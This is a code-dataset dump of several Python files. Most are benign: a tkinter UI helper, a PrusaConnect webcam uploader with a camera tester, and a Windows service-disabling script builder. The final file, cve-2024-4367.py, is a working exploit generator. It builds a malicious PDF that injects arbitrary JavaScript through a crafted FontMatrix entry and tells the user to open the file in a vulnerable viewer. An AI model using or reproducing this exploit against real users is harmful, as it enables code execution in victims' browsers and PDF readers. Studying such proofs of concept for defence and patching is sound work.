id
int64 0
458k
| file_name
stringlengths 4
119
| file_path
stringlengths 14
227
| content
stringlengths 24
9.96M
| size
int64 24
9.96M
| language
stringclasses 1
value | extension
stringclasses 14
values | total_lines
int64 1
219k
| avg_line_length
float64 2.52
4.63M
| max_line_length
int64 5
9.91M
| alphanum_fraction
float64 0
1
| repo_name
stringlengths 7
101
| repo_stars
int64 100
139k
| repo_forks
int64 0
26.4k
| repo_open_issues
int64 0
2.27k
| repo_license
stringclasses 12
values | repo_extraction_date
stringclasses 433
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2,290,100 | ui_refresh.py | MNeMoNiCuZ_ImageSorting/scripts/ui_refresh.py | import tkinter as tk
from .category_buttons import update_display # Ensure this import is correct
def refresh_ui(config, image_frame, thumbnails_frame, buttons_frame, console_frame):
print("Refreshing UI...") # Debug statement
print(f"Config during refresh: {config}") # Debug statement
if 'current_image_path' in config:
update_display(config, image_frame, thumbnails_frame)
update_console(console_frame, f"Refreshed UI with current image: {config['current_image_path']}")
else:
update_console(console_frame, "No image currently loaded")
print("No image currently loaded") # Debug statement
def update_console(console_frame, message):
for widget in console_frame.winfo_children():
widget.destroy()
console_label = tk.Label(console_frame, text=message, fg="white", bg="black", anchor="w")
console_label.pack(fill=tk.BOTH)
| 916 | Python | .py | 16 | 50.625 | 106 | 0.708054 | MNeMoNiCuZ/ImageSorting | 8 | 1 | 8 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,101 | CameraTester.py | BenVeghte_PrusaConnect-Webcam/CameraTester.py | import cv2
import subprocess
import os
import argparse
def verifyCamera(camera_id:str) -> bool:
"""Test to see if the camera can take a photo. Occasionally a camera will have multiple v4l devices so this makes sure you have selected the right one
Args:
camera_id (str): Path to the camera, relative to /dev/v4l/by-id/
Returns:
bool: Returns whether the camera is valid or not
"""
camera_path = "/dev/v4l/by-id/" + camera_id
cap = cv2.VideoCapture(camera_path)
if cap.isOpened():
ret, frame = cap.read()
cap.release()
return ret
else:
return False
def allCameraSnapshot():
"""Takes a photo with all connected USB V4L cameras (or at least tries to) and saves them so the user can figure out which camera is pointed where
"""
result = subprocess.run(["ls", "/dev/v4l/by-id/"], stdout=subprocess.PIPE).stdout.decode('utf-8').replace('\n', ' ')
v4l_devices = result.strip().split(' ')
for camera_id in v4l_devices:
camera_path = "/dev/v4l/by-id/" + camera_id
cap = cv2.VideoCapture(camera_path)
if cap.isOpened():
ret, frame = cap.read()
if ret == True:
cv2.imwrite(f"{camera_id}.jpg", frame)
print(camera_id)
cap.release()
print(f"All photos captured to {os.getcwd()}, copy the file name (minus the file extention) to the parameters of prusacam.py")
if __name__ == "__main__":
print("Taking a photo from all connected V4L cameras")
allCameraSnapshot()
| 1,581 | Python | .py | 37 | 35.432432 | 154 | 0.646592 | BenVeghte/PrusaConnect-Webcam | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,102 | prusacam.py | BenVeghte_PrusaConnect-Webcam/prusacam.py | import requests
import argparse
import cv2
import datetime
import pathlib
from PIL import Image
import json
import time
import json
import os
import logging
import sys
import CameraTester
DEFAULT_MAX_IMAGES = 500
TIMESTAMP_FMT = '%Y-%m-%d_%H_%M_%S'
logger = logging.getLogger("prusacam")
logger.setLevel(logging.DEBUG)
#Can either supply configuration json file
parser = argparse.ArgumentParser(description="Use the arguments to pass the token and camera path to the script, can either use just json or the rest of them")
parser.add_argument("-t", "--token", help="Token created by Prusa Connect")
parser.add_argument("-n", "--name", help="Printer name to assist in debugging", default="printer")
parser.add_argument("-f", "--fingerprint", help="Unique fingerprint >16 characters long")
parser.add_argument("-i", "--ip", help="Local IP address of the printer to check print status")
parser.add_argument("-k", "--apikey", help="PrusaLink API key, found on printer settings page of prusa connect")
parser.add_argument("-d", "--directory", help="Absolute path to directory where to store images")
parser.add_argument("-m", "--maximages", help = "Maximum number of images for this camera to store in image folder", default = DEFAULT_MAX_IMAGES)
parser.add_argument("-j", "--json", help="Absolute file path to configuration json file", default = None)
parser.add_argument("-r", "--rotate", help="How much to rotate the image by, needs to be a multiple of 90, optional", default=0)
parser.add_argument("-c", "--camera", help="Absolute path to the camera", default=None)
def putImage(token:str, fingerprint:str, img_path:pathlib.Path) -> requests.Response|None:
"""Send the image to PrusaConnect
Args:
token (str): Camera API Token
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
img_path (pathlib.Path): Absolute path to the photo just taken
Returns:
requests.Response: Response from the prusa servers
None: If the servers cannot be reached, return none
"""
snapshot_headers = {
'Content-Type': 'image/jpg',
'fingerprint': fingerprint,
'token': token
}
URL = "https://connect.prusa3d.com/c/snapshot"
with img_path.open(mode='rb') as f:
image = f.read()
try:
resp = requests.put(url=URL, headers=snapshot_headers, data = image)
if resp.status_code == 200: #Successful upload of image
logger.debug(f"{img_path.name} uploaded successfully")
else:
logger.exception(f"Put Image: Response Code {resp.status_code}. Content: {resp.content.decode()}")
raise ConnectionError(f"Put Image: Response Code {resp.status_code}. Content: {resp.content.decode()}")
return resp
except requests.exceptions.ConnectTimeout:
logger.warn(f"Put Image: Connection Timeout. Meaning {URL} could not be accessed")
return None
except ConnectionRefusedError:
logger.warn(f"Put Image: Connection Error. Meaning {URL} could not be accessed")
return None
except OSError:
logger.warn("Put Image: OSError. Network likely unreachable")
def getPrinterStatus(ip:str, api_key:str) -> dict:
"""Get the printer status from the PrusaLink webserver, possible statuses can be found here: https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L1269
Args:
ip (str): IP Address of the printers PrusaLink web interface
api_key (str): PrusaLink API Key
Returns:
dict: Content of the HTTP request response
None: If the connection times out, returns None instead
"""
try:
resp = requests.get(url=f"http://{ip}/api/v1/status", headers = {"x-api-key":api_key})
#See https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L43 for info about status codes and response format
if resp.status_code == 200:
return json.loads(resp.content)
else:
logger.exception(f"Printer Status: Response Code {resp.status_code}. Content: {resp.content.decode()}")
raise ConnectionError(f"Printer Status: Response Code {resp.status_code}. Content: {resp.content.decode()}")
except requests.exceptions.ConnectTimeout:
logger.warn(f"Printer status check timeout. IP: {ip}")
return None
except OSError:
logger.warn("Get Printer Status: OSError. Network likely unreachable")
def captureImage(camera_id:int|str, fingerprint:str, imgs_folder:pathlib.Path, rotation:int) -> pathlib.Path:
"""Take a photo with the selected webcam
Args:
camera_id (int|str): Integer of the camera as chosen by selectCamera() or the absolute path to the camera
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
imgs_folder (pathlib.Path): Absolute path to the images folder where to save the images taken
rotation (int): Input to use with cv2.rotate. Possible: None for no rotation, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_90_COUNTERCLOCKWISE, cv2.ROTATE_180
Returns:
pathlib.Path: Absolute path to the image just taken
"""
#Capture image
try:
cap = cv2.VideoCapture(camera_id)
if cap.isOpened():
ret, frame = cap.read()
if ret == True:
file_name = f"{fingerprint}_{datetime.datetime.now().strftime(TIMESTAMP_FMT)}.jpg"
img_path = imgs_folder/file_name
#Rotate if desired
if rotation is not None:
frame = cv2.rotate(frame, rotation)
cv2.imwrite(img_path, frame)
logger.debug(f"Saved image {img_path.name}")
cap.release()
return img_path
else:
logger.warn(f"Unable to open video capture {camera_id}")
except UnboundLocalError: # Cant
return None
def selectCamera(name:str) -> int:
"""Run at the beginning of everytime the script is run to select the correct camera
Args:
name (str): Name of the printer to help with debugging and identifying which script is being run
Returns:
int: The camera number to use with cv2.VideoCapture
"""
# Camera Selection
camera_id = -1
found = False
for i in range(10):
cap = cv2.VideoCapture(i)
if cap.read()[0]:
valid = False
while valid is False:
inp = input("Is the light on the desired camera on? y/n: ")
if inp.strip().lower() == "y" or inp.strip().lower() == "yes":
camera_id = i
valid = True
elif inp.strip().lower() == "n" or inp.strip().lower() == "no":
valid = True
else:
print("Invalid input, please try again, yes or no.")
cap.release()
if camera_id != -1:
break
if camera_id == -1:
print("No camera chosen, please check the connections")
else:
print(f"Camera {camera_id} chosen for printer {name}")
return camera_id
def deleteImages(imgs_folder:pathlib.Path,fingerprint:str, max_images:int):
""" Delete old images so as not to risk maxing out the storage
Args:
imgs_folder (pathlib.Path): Absolute path to the images folder where to save the images taken
fingerprint (str): The fingerprint set for the camera token (set at the time of the first use of the Camera API Token)
max_images (int): Max number of images allowed to be stored for this printer
"""
imgs = list(imgs_folder.glob(f"{fingerprint}_*.jpg"))
if len(imgs) > max_images:
sorted_imgs = sorted(imgs, key = lambda x: datetime.datetime.strptime(x.stem[len(fingerprint)+1:], TIMESTAMP_FMT))
for img in sorted_imgs[:-max_images]:
img.unlink()
logger.debug(f"Deleted {len(imgs)-max_images} image(s)")
def uncaughtExceptionsHandler(exc_type, exc_value, exc_traceback):
"""Make sure all exceptions get put in the log file for easy debugging
"""
if issubclass(exc_type, KeyboardInterrupt):
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
else:
logger.critical("Unhandled exception", exc_info=(exc_type, exc_value, exc_traceback))
sys.__excepthook__(exc_type, exc_value, exc_traceback)
return
if __name__ == "__main__":
sys.excepthook = uncaughtExceptionsHandler
#Argparse
args = parser.parse_args()
##Parse json file if its given
if args.json is not None:
with open(args.json) as f:
config = json.load(f)
printer_name = config["name"]
fh = logging.FileHandler(f"{printer_name}.log")
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
token = config["token"]
fingerprint = config["fingerprint"]
if len(fingerprint) < 16:
raise ValueError("Fingerprint needs to be longer than 16 characters")
ip = config["ip"]
pl_api_key = config["apikey"]
imgs_folder = pathlib.Path(config["directory"])
try:
possible_rot = [None, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_180, cv2.ROTATE_90_COUNTERCLOCKWISE]
if int(config["rotate"]/90) == config["rotate"]/90:
rot_ind = int(config["rotate"]/90)
image_rotation = possible_rot[rot_ind]
else:
raise TypeError(f"User input ({config['rotate']}) is not allowed, needs to be a multiple of 90")
except KeyError:
image_rotation = None
#Max Images
try:
max_images = config["maximages"]
except KeyError:
max_images = DEFAULT_MAX_IMAGES
#Image Folder
if imgs_folder.exists():
if imgs_folder.is_file():
raise FileExistsError("Directory input already exists as a file, needs to be a folder")
else:
imgs_folder.mkdir(parents=True)
#Select Camera
try:
camera_id = config["camera"]
ret = CameraTester.verifyCamera(camera_id)
if ret is False:
raise ConnectionError("Argument supplied camera path is invalid, please select the camera manually by not passing in argument to -c or --camera or try a different absolute path. \n Sometimes cameras create multiple v4l devices so try other indicies (see readme)")
else:
camera_id = "/dev/v4l/by-id/" + camera_id
except KeyError:
camera_id = selectCamera(printer_name)
##JSON args is not passed
else:
printer_name = args.name
fh = logging.FileHandler(f"{printer_name}.log")
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S')
fh.setFormatter(formatter)
logger.addHandler(fh)
token = args.token
fingerprint = args.fingerprint
possible_rot = [None, cv2.ROTATE_90_CLOCKWISE, cv2.ROTATE_180, cv2.ROTATE_90_COUNTERCLOCKWISE]
if int(args.rotate) == float(args.rotate):
if int(int(args.rotate)/90) == int(args.rotate)/90:
rot_ind = int(int(args.rotate)/90)
image_rotation = possible_rot[rot_ind]
else:
raise TypeError(f"User input ({args.rotate}) is not allowed, needs to be a multiple of 90")
else:
raise TypeError(f"User input ({args.rotate}) is not allowed, needs to be a multiple of 90")
if len(fingerprint) < 16:
raise ValueError("Fingerprint needs to be longer than 16 characters")
ip = args.ip
pl_api_key = args.apikey
imgs_folder = pathlib.Path(args.directory)
max_images = int(args.maximages)
if imgs_folder.exists():
if imgs_folder.is_file():
raise FileExistsError("Directory input already exists as a file, needs to be a folder")
else:
imgs_folder.mkdir(parents=True)
#Select Camera
if args.camera is None:
camera_id = selectCamera(printer_name)
else:
camera_id = args.camera
ret = CameraTester.verifyCamera(camera_id)
if ret is False:
raise ConnectionError("Argument supplied camera path is invalid, please select the camera manually by not passing in argument to -c or --camera or try a different absolute path. \n Sometimes cameras create multiple v4l devices so try other indicies (see readme)")
#Infinite loop to get photos, and check printer status
status = getPrinterStatus(ip, pl_api_key)
if status is None: #Means the software couldn't connect to the printer
printer_status = "IDLE"
else:
printer_status = status["printer"]["state"]
while True:
count = 0
# Possible printer statuses can be found here: https://github.com/prusa3d/Prusa-Link-Web/blob/master/spec/openapi.yaml#L1269
#If the printer is printing
while printer_status == "PRINTING":
status = getPrinterStatus(ip, pl_api_key)
if status is not None: #If the status check works properly change the state, otherwise do nothing
printer_status = status["printer"]["state"]
img_path = captureImage(camera_id, fingerprint, imgs_folder, image_rotation)
if img_path is not None: #If the image was saved properly
putImage(token, fingerprint, img_path)
#Delete images every so often to reduce CPU load
count += 1
if count > 20:
count = 0
deleteImages(imgs_folder, fingerprint, max_images)
time.sleep(60)
#Printer is in any other state
while printer_status != "PRINTING":
status = getPrinterStatus(ip, pl_api_key)
if status is not None: #If the status check works properly change the state, otherwise do nothing
printer_status = status["printer"]["state"]
img_path = captureImage(camera_id, fingerprint, imgs_folder, image_rotation)
if img_path is not None:
putImage(token, fingerprint, img_path)
#Delete images every so often to reduce CPU load
count += 1
if count > 20:
count = 0
deleteImages(imgs_folder, fingerprint, max_images)
time.sleep(120)
| 14,948 | Python | .py | 294 | 41.064626 | 279 | 0.644571 | BenVeghte/PrusaConnect-Webcam | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,103 | consts.py | valleyofdoom_service-list-builder/service_list_builder/consts.py | VERSION = "1.6.3"
USER_MODE_TYPES = {16, 32, 96, 288, 80, 272}
HIVE = "SYSTEM\\CurrentControlSet"
LOAD_HIVE_LINES = f"""@echo off
REM This script was built using service-list-builder v{VERSION}
REM ---> IMPORTANT: Do NOT run this script on any system other than the one it was generated on <---
REM Set drive letter to target
set "DRIVE_LETTER=C"
if not "%DRIVE_LETTER%" == "C" (
reg load "HKLM\\tempSYSTEM" "%DRIVE_LETTER%:\\Windows\\System32\\config\\SYSTEM"
if not %errorlevel% == 0 (echo error: failed to load SYSTEM hive && pause && exit /b 1)
set "HIVE=tempSYSTEM\\ControlSet001"
) else (
set "HIVE={HIVE}"
)
reg query "HKLM\\%HIVE%" > nul 2>&1 || echo error: hive not exists or is unloaded && pause && exit /b 1
"""
# use lowercase key as the path will be converted to lowercase when comparing
IMAGEPATH_REPLACEMENTS = {
"\\systemroot\\": "C:\\Windows\\",
"system32\\": "C:\\Windows\\System32\\",
"\\??\\": "",
}
| 953 | Python | .py | 23 | 39 | 103 | 0.67027 | valleyofdoom/service-list-builder | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,104 | main.py | valleyofdoom_service-list-builder/service_list_builder/main.py | import argparse
import ctypes
import logging
import os
import re
import sys
import winreg
from collections import deque
from configparser import ConfigParser, SectionProxy
from datetime import datetime
from typing import Any
import pywintypes
import win32api
import win32service
import win32serviceutil
from consts import HIVE, IMAGEPATH_REPLACEMENTS, LOAD_HIVE_LINES, USER_MODE_TYPES, VERSION
LOG_CLI = logging.getLogger("CLI")
def read_value(path: str, value_name: str) -> Any | None:
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
path,
0,
winreg.KEY_READ | winreg.KEY_WOW64_64KEY,
) as key:
return winreg.QueryValueEx(key, value_name)[0]
except FileNotFoundError:
return None
def get_dependencies(service: str, kernel_mode: bool) -> set[str]:
dependencies: list[str] | None = read_value(
f"{HIVE}\\Services\\{service}",
"DependOnService",
)
# base case
if dependencies is None or len(dependencies) == 0:
return set()
if not kernel_mode:
# remove kernel-mode services from dependencies list so we are left with
# user-mode dependencies only
dependencies = [
dependency
for dependency in dependencies
if read_value(f"{HIVE}\\Services\\{dependency}", "Type") in USER_MODE_TYPES
]
child_dependencies = {
child_dependency
for dependency in dependencies
for child_dependency in get_dependencies(dependency, kernel_mode)
}
return set(dependencies).union(child_dependencies)
def get_present_services() -> dict[str, str]:
# keeps track of service in lowercase (key) and actual service name (value)
present_services: dict[str, str] = {}
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{HIVE}\\Services") as key:
num_subkeys = winreg.QueryInfoKey(key)[0]
for i in range(num_subkeys):
service_name = winreg.EnumKey(key, i)
# handle (remove) user ID in service name
if "_" in service_name:
service_name_without_id = service_name.rpartition("_")[0]
is_service_exists = service_name_without_id.lower() in present_services
if is_service_exists:
LOG_CLI.debug('removing "_" in "%s"', service_name)
service_name = service_name_without_id
present_services[service_name.lower()] = service_name
return present_services
def parse_config_list(
service_list: SectionProxy,
present_services: dict[str, str],
) -> set[str]:
return {
present_services[lower_service]
for service in service_list
if (lower_service := service.lower()) in present_services
}
def get_file_metadata(file_path: str, attribute: str) -> str:
lang, code_page = win32api.GetFileVersionInfo(file_path, "\\VarFileInfo\\Translation")[0]
file_info_key = f"\\StringFileInfo\\{lang:04x}{code_page:04x}\\"
product_name = win32api.GetFileVersionInfo(file_path, f"{file_info_key}{attribute}")
if not product_name:
return ""
return str(product_name)
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--config",
metavar="<config>",
type=str,
help="path to lists config file",
)
group.add_argument(
"--get-dependencies",
metavar="<service>",
type=str,
help="returns the entire dependency tree for a given service",
)
parser.add_argument(
"--disable-running",
help="only disable services specified in the list that are currently running",
action="store_true",
)
parser.add_argument(
"--kernel-mode",
help="includes kernel-mode services in the dependency tree when using --get-dependencies",
action="store_true",
)
parser.add_argument(
"--disable-service-warning",
help="disable the non-Windows services warning",
action="store_true",
)
args = parser.parse_args()
if args.kernel_mode and not args.get_dependencies:
parser.error("--kernel-mode can only be used with --get_dependencies")
if args.disable_running and not args.config:
parser.error("--disable-running can only be used with --config")
return args
def is_windows_service(service_name: str) -> bool | None:
image_path = read_value(f"{HIVE}\\Services\\{service_name}", "ImagePath")
if image_path is None:
LOG_CLI.info('unable to get image path for "%s"', service_name)
return None
path_match = re.match(r".*?\.(exe|sys)\b", image_path, re.IGNORECASE)
if path_match is None:
LOG_CLI.error('image path match failed for "%s"', image_path)
return None
# expand vars
binary_path: str = os.path.expandvars(path_match[0])
lower_binary_path = binary_path.lower()
# resolve paths
if lower_binary_path.startswith('"'):
lower_binary_path = lower_binary_path[1:]
for starts_with, replacement in IMAGEPATH_REPLACEMENTS.items():
if lower_binary_path.startswith(starts_with):
lower_binary_path = lower_binary_path.replace(starts_with, replacement)
if not os.path.exists(lower_binary_path):
LOG_CLI.info('unable to get binary path for "%s"', service_name)
return None
try:
company_name = get_file_metadata(lower_binary_path, "CompanyName")
if not company_name:
raise pywintypes.error
except pywintypes.error:
LOG_CLI.info('unable to get CompanyName for "%s"', service_name)
return None
return company_name == "Microsoft Corporation"
def main() -> int:
logging.basicConfig(format="[%(name)s] %(levelname)s: %(message)s", level=logging.INFO)
present_services = get_present_services()
print(
f"service-list-builder Version {VERSION} - GPLv3\n",
)
if not ctypes.windll.shell32.IsUserAnAdmin():
LOG_CLI.error("administrator privileges required")
return 1
if getattr(sys, "frozen", False):
os.chdir(os.path.dirname(sys.executable))
elif __file__:
os.chdir(os.path.dirname(__file__))
args = parse_args()
if args.get_dependencies:
lower_get_dependencies = args.get_dependencies.lower()
if lower_get_dependencies not in present_services:
LOG_CLI.error("%s not exists as a service", args.get_dependencies)
return 1
dependencies = {
present_services[dependency.lower()]
for dependency in get_dependencies(args.get_dependencies, args.kernel_mode)
}
service_name = present_services[lower_get_dependencies]
print(
(
f"{service_name} has 0 dependencies"
if len(dependencies) == 0
else f"{service_name} depends on {', '.join(dependencies)}"
),
)
return 0
if not os.path.exists(args.config):
LOG_CLI.error("config file %s not found", args.config)
return 1
config = ConfigParser(
allow_no_value=True,
delimiters=("="),
inline_comment_prefixes="#",
)
# prevent lists imported as lowercase
config.optionxform = lambda optionstr: optionstr
config.read(args.config)
# load sections from config and handle case insensitive entries
enabled_services = parse_config_list(config["enabled_services"], present_services)
individual_disabled_services = parse_config_list(
config["individual_disabled_services"],
present_services,
)
rename_binaries = {binary for binary in config["rename_binaries"] if binary != ""}
# start service_dump with the individual disabled services section
service_dump: set[str] = individual_disabled_services.copy()
# check dependencies
has_dependency_errors = False
# required for lowercase comparison
lower_services_set: set[str] = {service.lower() for service in enabled_services}
if enabled_services:
# populate service_dump with all user mode services that are not in enabled_services section
for lower_service_name, service_name in present_services.items():
# don't add services that the user want's to keep enabled in the service dump
if lower_service_name in lower_services_set:
continue
service_type = read_value(f"{HIVE}\\Services\\{service_name}", "Type")
if service_type is not None:
service_type = int(service_type)
if service_type in USER_MODE_TYPES:
service_dump.add(service_name)
dependencies_to_resolve: set[str] = set()
for service in enabled_services:
# get a set of the dependencies in lowercase
dependencies = {service.lower() for service in get_dependencies(service, kernel_mode=False)}
# check which dependencies are not in the user's list
# then get the actual name from present_services as it was converted to lowercase to handle case inconsistency in Windows
missing_dependencies = {
present_services[dependency] for dependency in dependencies.difference(lower_services_set)
}
if len(missing_dependencies) > 0:
has_dependency_errors = True
LOG_CLI.error("%s depends on %s", service, ", ".join(missing_dependencies))
dependencies_to_resolve.update(missing_dependencies)
# check for services that depend on ones that are getting disabled
requiredby_services: dict[str, set[str]] = {}
for lower_service_name, service_name in present_services.items():
# don't consider services that are getting disabled
if service_name in service_dump:
continue
dependencies = {service.lower() for service in get_dependencies(service_name, kernel_mode=True)}
for dependency in dependencies:
# somehow some services can depend on non-installed services...?
if dependency not in present_services:
continue
dependency_service_name = present_services[dependency]
is_usermode_service = read_value(f"{HIVE}\\Services\\{dependency_service_name}", "Type") in USER_MODE_TYPES
if (
enabled_services
and is_usermode_service
and dependency_service_name not in enabled_services
or dependency_service_name in individual_disabled_services
):
has_dependency_errors = True
if dependency_service_name in requiredby_services:
requiredby_services[dependency_service_name].add(service_name)
else:
requiredby_services[dependency_service_name] = {service_name}
for service, requiredby_service in requiredby_services.items():
LOG_CLI.error("%s is required by %s", service, ", ".join(requiredby_service))
dependencies_to_resolve.add(service)
if dependencies_to_resolve:
print() # new line to separate logs
for service in dependencies_to_resolve:
if service in individual_disabled_services:
LOG_CLI.info("remove %s from [individual_disabled_services] to fix dependency errors", service)
is_usermode_service = read_value(f"{HIVE}\\Services\\{service}", "Type") in USER_MODE_TYPES
if enabled_services and is_usermode_service:
LOG_CLI.info("add %s to [enabled_services] to fix dependency errors", service)
if has_dependency_errors:
return 1
if not args.disable_service_warning:
# check if any services are non-Windows services as the user
# likely does not want to disable these
non_microsoft_service_count = 0
unknown_company_service_count = 0
for service_name in service_dump:
is_win_service = is_windows_service(service_name)
if is_win_service is None:
unknown_company_service_count += 1
continue
if not is_win_service:
LOG_CLI.info('"%s" is not a Windows service', service_name)
non_microsoft_service_count += 1
if non_microsoft_service_count + unknown_company_service_count != 0:
print(
f"\n{non_microsoft_service_count} non-Windows services detected, {unknown_company_service_count} service vendors are unknown. are you sure you want to disable these?\nedit the config or use --disable-service-warning to suppress this warning if this is intentional"
)
return 1
if args.disable_running:
for service in service_dump.copy():
if not win32serviceutil.QueryServiceStatus(service)[1] == win32service.SERVICE_RUNNING:
service_dump.remove(service)
# store contents of batch scripts
ds_lines: deque[str] = deque()
es_lines: deque[str] = deque()
for binary in rename_binaries:
if os.path.exists(f"C:{binary}"):
file_name = os.path.basename(binary)
file_extension = os.path.splitext(file_name)[1]
if file_extension == ".exe":
# processes should be killed before being renamed
ds_lines.append(f"taskkill /f /im {file_name}")
last_index = binary[-1] # .exe gets renamed to .exee
ds_lines.append(f'REN "%DRIVE_LETTER%:{binary}" "{file_name}{last_index}"')
es_lines.append(f'REN "%DRIVE_LETTER%:{binary}{last_index}" "{file_name}"')
else:
LOG_CLI.info("item does not exist: %s... skipping", binary)
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, f"{HIVE}\\Control\\Class") as key:
num_subkeys = winreg.QueryInfoKey(key)[0]
for i in range(num_subkeys):
filter_id = winreg.EnumKey(key, i)
for filter_type in ("LowerFilters", "UpperFilters"):
original: list[str] | None = read_value(
f"{HIVE}\\Control\\Class\\{filter_id}",
filter_type,
)
# check if the filter exists
if original is not None:
new = original.copy() # to keep a backup of the original
for driver in original:
if driver in service_dump:
new.remove(driver)
# check if original was modified at all
if original != new:
ds_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Control\\Class\\{filter_id}" /v "{filter_type}" /t REG_MULTI_SZ /d "{"\\0".join(new)}" /f',
)
es_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Control\\Class\\{filter_id}" /v "{filter_type}" /t REG_MULTI_SZ /d "{"\\0".join(original)}" /f',
)
for service in sorted(service_dump, key=str.lower):
original_start_value = read_value(f"{HIVE}\\Services\\{service}", "Start")
if original_start_value is not None:
ds_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Services\\{service}" /v "Start" /t REG_DWORD /d "4" /f',
)
es_lines.append(
f'reg.exe add "HKLM\\%HIVE%\\Services\\{service}" /v "Start" /t REG_DWORD /d "{original_start_value}" /f',
)
if not ds_lines:
LOG_CLI.info("there are no changes to write to the scripts")
return 0
for script_lines in (ds_lines, es_lines):
for line in LOAD_HIVE_LINES.split("\n")[::-1]:
script_lines.appendleft(line)
script_lines.append("shutdown /r /f /t 0")
current_time = datetime.now()
if not os.path.exists("build"):
os.mkdir("build")
build_dir = os.path.join("build", f"build-{current_time.strftime("%d%m%y%H%M%S")}")
os.makedirs(build_dir)
with open(os.path.join(build_dir, "Services-Disable.bat"), "w", encoding="utf-8") as file:
for line in ds_lines:
file.write(f"{line}\n")
with open(os.path.join(build_dir, "Services-Enable.bat"), "w", encoding="utf-8") as file:
for line in es_lines:
file.write(f"{line}\n")
LOG_CLI.info("done - scripts built in .\\%s", build_dir)
return 0
if __name__ == "__main__":
sys.exit(main())
| 16,598 | Python | .py | 355 | 37.11831 | 280 | 0.630479 | valleyofdoom/service-list-builder | 8 | 3 | 0 | GPL-3.0 | 9/5/2024, 10:48:51 PM (Europe/Amsterdam) |
2,290,105 | cve-2024-4367.py | Zombie-Kaiser_cve-2024-4367-PoC-fixed/cve-2024-4367.py | import sys
def generate_payload(payload):
escaped_payload = payload.replace('(', '\\(').replace(')', '\\)')
return f"""
%PDF-1.4
%DUMMY
8 0 obj
<<
/PatternType 2
/Shading<<
/Function<<
/Domain[0 1]
/C0[0 0 1]
/C1[1 0.6 0]
/N 1
/FunctionType 2
>>
/ShadingType 2
/Coords[46 400 537 400]
/Extend[false false]
/ColorSpace/DeviceRGB
>>
/Type/Pattern
>>
endobj
5 0 obj
<<
/Widths[573 0 582 0 548 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 573 0 573 0 341]
/Type/Font
/BaseFont/PAXEKO+SourceSansPro-Bold
/LastChar 102
/Encoding/WinAnsiEncoding
/FontMatrix [0.1 0 0 0.1 0 (1\\);\n{escaped_payload}\n//)]
/Subtype/Type1
/FirstChar 65
/FontDescriptor 9 0 R
>>
endobj
2 0 obj
<<
/Kids[3 0 R]
/Type/Pages
/Count 1
>>
endobj
9 0 obj
<<
/Type/FontDescriptor
/ItalicAngle 0
/Ascent 751
/FontBBox[-6 -12 579 713]
/FontName/PAXEKO+SourceSansPro-Bold
/StemV 100
/CapHeight 713
/Flags 32
/FontFile3 10 0 R
/Descent -173
/MissingWidth 250
>>
endobj
6 0 obj
<<
/Length 128
>>
stream
47 379 489 230 re S
/Pattern cs
BT
50 500 Td
117 TL
/F1 150 Tf
/P1 scn
(AbCdEf) Tj
/P2 scn
(AbCdEf) '
ET
endstream
endobj
3 0 obj
<<
/Type/Page
/Resources 4 0 R
/Contents 6 0 R
/Parent 2 0 R
/MediaBox[0 0 595.2756 841.8898]
>>
endobj
10 0 obj
<<
/Length 800
/Subtype/Type2
>>
stream
endstream
endobj
7 0 obj
<<
/PatternType 1
/Matrix[1 0 0 1 50 0]
/Length 58
/TilingType 1
/BBox[0 0 16 16]
/YStep 16
/PaintType 1
/Resources<<
>>
/XStep 16
>>
stream
0.65 g
0 0 16 16 re f
0.15 g
0 0 8 8 re f
8 8 8 8 re f
endstream
endobj
4 0 obj
<<
/Pattern<<
/P1 7 0 R
/P2 8 0 R
>>
/Font<<
/F1 5 0 R
>>
>>
endobj
1 0 obj
<<
/Pages 2 0 R
/Type/Catalog
/OpenAction[3 0 R /Fit]
>>
endobj
xref
0 11
0000000000 65535 f
0000002260 00000 n
0000000522 00000 n
0000000973 00000 n
0000002178 00000 n
0000000266 00000 n
0000000794 00000 n
0000001953 00000 n
0000000015 00000 n
0000000577 00000 n
0000001085 00000 n
trailer
<<
/ID[(DUMMY) (DUMMY)]
/Root 1 0 R
/Size 11
>>
startxref
2333
%%EOF
"""
if __name__ == "__main__":
if len(sys.argv) < 2 or len(sys.argv) > 3:
print(f"Usage: {sys.argv[0]} <payload>")
print(f"or Usage: {sys.argv[0]} <payload> <filename>")
sys.exit(1)
payload = generate_payload(
sys.argv[1])
out = "poc.pdf"
if len(sys.argv) == 3:
out = sys.argv[2]
with open(out, "w") as f:
f.write(payload)
print("[+] Created malicious PDF file: " + out)
print("[+] Open the file with the vulnerable application to trigger the exploit.")
